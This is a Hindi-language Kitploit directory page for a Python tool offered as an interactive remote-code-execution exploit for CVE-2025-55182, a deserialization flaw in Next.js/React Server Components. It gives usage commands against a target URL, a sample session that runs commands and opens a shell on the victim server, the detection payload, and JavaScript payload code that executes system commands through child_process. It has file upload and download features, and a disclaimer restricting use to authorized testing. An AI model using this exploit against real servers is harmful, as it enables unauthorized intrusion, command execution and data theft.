Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-shellinteractive — CVE-2025-55182 के लिए इंटरैक्टिव RCE एक्सप्लॉइट, जो Next.js/React सर्वर घटकों की deserialization कमज़ोरी को लक्षित करता है। इसमें स्वचालित पहचान, कमांड निष्पादन, फ़ाइल स्थानांतरण, और इतिहास एवं ऑटोकम्प्लीशन के साथ एक अंतर्निहित शेल शामिल है। | Kitploit
उपकरण/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

CVE-2025-55182-shellinteractive

CVE-2025-55182 के लिए इंटरैक्टिव RCE एक्सप्लॉइट, जो Next.js/React सर्वर घटकों की deserialization कमज़ोरी को लक्षित करता है। इसमें स्वचालित पहचान, कमांड निष्पादन, फ़ाइल स्थानांतरण, और इतिहास एवं ऑटोकम्प्लीशन के साथ एक अंतर्निहित शेल शामिल है।

रिपॉजिटरी देखें
2139 महीने पहलेKitploit द्वारा समीक्षित
साझा करें

CVE-2025-55182-shellinteractive

आधार इससे लिया गया: https://github.com/Emiyelbarto/CVE-2025-55182-PoC महान योगदान के लिए बहुत-बहुत धन्यवाद।

अवलोकन

CVE-2025-55182 एक डिसीरियलाइज़ेशन भेद्यता है जो Next.js/React Server Components में है, जो अप्रमाणित दूरस्थ हमलावरों को प्रभावित सर्वरों पर मनमाना कोड निष्पादित करने की अनुमति देती है। यह भेद्यता React Server Actions में सीरियलाइज़्ड डेटा के अनुचित हैंडलिंग से उत्पन्न होती है।

मुख्य विशेषताएं:

  • ✅ कमांड इतिहास और ऑटोकम्पलीशन के साथ इंटरैक्टिव शेल
  • ✅ स्वचालित भेद्यता पहचान
  • ✅ दूरस्थ कमांड निष्पादन
  • ✅ फ़ाइल अपलोड/डाउनलोड क्षमताएं
  • ✅ अंतर्निहित परीक्षण सूट
  • ✅ कॉन्फ़िगरेबल लक्ष्य पैरामीटर

स्थापना

पूर्वापेक्षाएँ

  • Python 3.8 या उच्चतर
  • requests लाइब्रेरी

त्वरित सेटअप

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma

# Install dependencies
pip install requests

# Make script executable (optional)
chmod +x hokma.py

उपयोग

मूल उपयोग

root@kitploit:~
# Start interactive shell
python hokma.py

# Check vulnerability only
python hokma.py -u http://target.com --check

# Execute single command
python hokma.py -u http://target.com -c "whoami"

इंटरैक्टिव शेल कमांड

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

उदाहरण सत्र

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

कॉन्फ़िगरेशन विकल्प

विकल्पडिफ़ॉल्टविवरण
लक्ष्य URLकोई नहींअसुरक्षित एप्लिकेशन का URL
क्रिया IDuser-profile-actionलक्ष्य के लिए सर्वर क्रिया ID
समय-सीमा3 सेकंडअनुरोध समय-सीमा

तकनीकी विवरण

भेद्यता का पता लगाना

यह उपकरण एक विशेष रूप से तैयार किया गया मल्टीपार्ट अनुरोध भेजता है जो असुरक्षित सिस्टम में क्रैश ट्रिगर करता है:

  • पेलोड का उपयोग करता है: ["$1:a:a"] एक खाली ऑब्जेक्ट {} के साथ
  • HTTP 500 प्रतिक्रियाओं या विशिष्ट त्रुटि पैटर्न के माध्यम से भेद्यता का पता लगाता है

शोषण तंत्र

  1. JavaScript पेलोड निर्माण: Function कंस्ट्रक्टर का उपयोग करके एक Node.js स्क्रिप्ट बनाता है
  2. चाइल्ड प्रोसेस निष्पादन: सिस्टम कमांड चलाने के लिए child_process.execSync() का उपयोग करता है
  3. प्रतिक्रिया निष्कर्षण: कमांड आउटपुट को कैप्चर और प्रदर्शित करता है

पेलोड संरचना

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

नैतिक उपयोग और अस्वीकरण

महत्वपूर्ण कानूनी सूचना

यह उपकरण इसके लिए अभिप्रेत है:

  • अधिकृत सुरक्षा परीक्षण
  • शैक्षिक उद्देश्य
  • उचित सहमति के साथ भेद्यता अनुसंधान

इस उपकरण का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।

डेवलपर्स इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं। उपयोगकर्ताओं को सभी लागू कानूनों का पालन करना होगा और परीक्षण से पहले उचित प्राधिकरण प्राप्त करना होगा।

ज्ञात सीमाएँ

  1. लक्ष्य आवश्यकताएँ:

    • React Server Components के साथ Node.js सर्वर
    • CVE-2025-55182 के लिए असुरक्षित
    • चाइल्ड प्रोसेस मॉड्यूल उपलब्ध
  2. पता लगाने की सीमाएँ:

    • गलत सकारात्मक/नकारात्मक उत्पन्न कर सकता है
    • विशिष्ट त्रुटि प्रतिक्रियाओं पर निर्भर करता है
  3. शोषण बाधाएँ:

    • कमांड सर्वर प्रक्रिया विशेषाधिकारों के साथ निष्पादित होते हैं
    • कुछ मामलों में आउटपुट छोटा हो सकता है
    • जटिल कमांड को विशेष एस्केपिंग की आवश्यकता हो सकती है
टूल डाउनलोड करें